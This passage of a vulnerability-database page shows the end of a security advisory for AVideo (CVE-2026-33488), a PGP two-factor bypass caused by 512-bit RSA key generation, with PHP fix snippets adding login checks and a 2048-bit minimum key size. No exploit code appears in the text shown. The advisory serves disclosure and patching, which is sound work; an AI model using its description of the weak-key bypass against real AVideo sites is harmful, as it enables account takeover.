\u0027../../../videos/configuration.php\u0027;\nrequire_once \u0027../../../plugin/LoginControl/pgp/functions.php\u0027;\nheader(\u0027Content-Type: application/json\u0027);\n\n$obj = new stdClass();\n$obj-\u003eerror = true;\n\n$plugin = AVideoPlugin::loadPluginIfEnabled(\u0027LoginControl\u0027);\n\nif (!User::isLogged()) {\n    $obj-\u003emsg = \"Authentication required\";\n    die(json_encode($obj));\n}\n// ... rest of existing code\n```\n\n**3. Add authentication to `encryptMessage.json.php`** (same pattern):\n\n```php\n\u003c?php\nrequire_once \u0027../../../videos/configuration.php\u0027;\nrequire_once \u0027../../../plugin/LoginControl/pgp/functions.php\u0027;\n// Add auth check before processing\nif (!User::isLogged()) {\n    $obj-\u003emsg = \u0027Authentication required\u0027;\n    die(json_encode($obj));\n}\n```\n\n**4. Add minimum key size validation in `savePublicKey.json.php`** to reject weak keys regardless of how they were generated:\n\n```php\n// After line 26, before saving:\n$keyData = OpenPGP_Message::parse(OpenPGP::unarmor($_REQUEST[\u0027publicKey\u0027], \u0027PGP PUBLIC KEY BLOCK\u0027));\nif ($keyData \u0026\u0026 $keyData[0] instanceof OpenPGP_PublicKeyPacket) {\n    $bitLength = strlen($keyData[0]-\u003ekey[\u0027n\u0027]) * 8;\n    if ($bitLength \u003c 2048) {\n        $obj-\u003emsg = \"Key size too small. Minimum 2048 bits required.\";\n        die(json_encode($obj));\n    }\n}\n```",
  "id": "GHSA-6m5f-j7w2-w953",
  "modified": "2026-03-25T20:30:55Z",
  "published": "2026-03-20T20:49:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33488"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has a PGP 2FA Bypass via Cryptographically Broken 512-bit RSA Key Generation in LoginControl Plugin"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33488 (GCVE-0-2026-33488)

FKIE_CVE-2026-33488

GHSA-6M5F-J7W2-W953

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature